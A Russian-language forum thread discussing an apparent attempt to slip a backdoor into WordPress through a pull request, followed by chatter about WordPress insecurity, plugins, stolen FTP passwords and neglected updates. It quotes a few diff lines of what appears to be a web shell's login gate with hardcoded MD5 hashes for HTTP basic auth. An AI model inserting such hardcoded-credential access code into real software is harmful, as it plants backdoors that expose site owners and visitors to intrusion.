внедрение бэкдора в WordPress

Не первый же раз, вроде бы.

homakov commented
rebase pls, I will merge then

:D

насколько я понял весь прикол в

15 +$auth = 1;
16 +$name='4ced0e3abe1ac578c40152b1a2cf6583'; // Saudi
17 +$pass='4ced0e3abe1ac578c40152b1a2cf6583'; // Saudi
18 +if($auth == 1) {
19 +if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
20 + {

Адское решето этот вордпресс, Большинство сайтов, которые заражены всякими JS.Trojan.Downloader-ами на вордпрессе.

Просто обновляться надо. Учитывая процесс в один клик, я не понимаю тех, кто не ставит обновления безопасности.

Это всего лишь последствия того, что установить и использовать wp может любой человек в пару кликов мышкой. И практически всегда этот человек даже не подозревает о каких-либо мерах безопасности.

Кстати, джумла тоже.

причина как правило не говновордпрес, а стыреные пароли ftp

Замкнутый круг. Скрипт на сайте скачивает троян, который ворует эти пароли.

По поводу обновления. Меня бесят конторы, которые делают сайты на вордпрессе, друпале, джумле и т.д. за неплохие деньги и забивают на дальнейшше развитие. Тут может быть несколько причин - либо у заказчика на шее сидит земноводное, либо «прогромисты-сайтоклепатели» этой конторы ничего не хотят делать. А потом, когда грянет гром, на сайте дрянь, гугл и яндекс радостно рапортуют том что сайт представляет угрозу для компьютера, владельцы сайта бегут за помощью к другим конторам, которые занимаются лечением сайтов (а деньги берут за это немалые). И тут срабатывает поговорка про скупого, который платит дважды.

У сайтегов за 500 баксов по определению не может быть нормального цикла развития. Не предусмотрено в бюджете.
Школьники кое-как навалят плагинов, нарисуют скин да поковыряют ядро, что на него потом дышать страшно, не то что обновлять, при всём желании.

поковыряют ядро, что на него потом дышать страшно, не то что обновлять, при всём желании.

В точку.

а как же обладатели всяких локализованных и твиканных версий, которые обновлений полгода ждут?

Не, причина таки обычно в дырах в самом движке и установленных модулях. По FTP тоже некоторых ломают, но это не так популярно.

а как же обладатели всяких локализованных и твиканных версий, которые обновлений полгода ждут?

Это же как сборки XP - говноедство. Говноеды должны страдать.

Как раз наоборот. В логах фтп глухо (причём юзер их даже считать от себя не может - нос не дорос), а на сайте ёбом шеллов и спамилок.

ЗЫ: Как правило такое пару раз вычищается, если на том конце провода совсем невменяемые блондинки - давай досвидания. Ибо сидеть и перетряхивать бешеные тысячи скриптов в поисках очередного ебучего eval() в задачи админа хостинга не входит.

спасибо, поржал, пацаны-хакеры — они такие, да...

значит нефиг повсюду раздавать 777 и ставить плагины без аудита
вордпрес тормоз и mvc там не валялся, но майнтейнится хорошо, дыр в нем практически нет, а известные закрываются быстро

Это кто же ему привилегии на запись даст?

нет, чаще всего дело в плагинах

обладатели всяких локализованных

в wp локализация из коробки

еще год назад это было не так. сейчас - не знаю.

http://ru.wordpress.org/

Это кто же ему привилегии на запись даст?

На всех нормальных шаредах юзер может писать в пределах хомяка. Что не так-то?

Что не так-то?

Безопасность. Когда скрипт имеет возможность записи сам в себя ... впрочем, про php и безопасность говорили уже столько, что и повторять незачем.

php и безопасность

плохо сочетаются вместе.

еще год назад это было не так. сейчас - не знаю.

В 2010 ставил локализованную версию WP. С русским языком.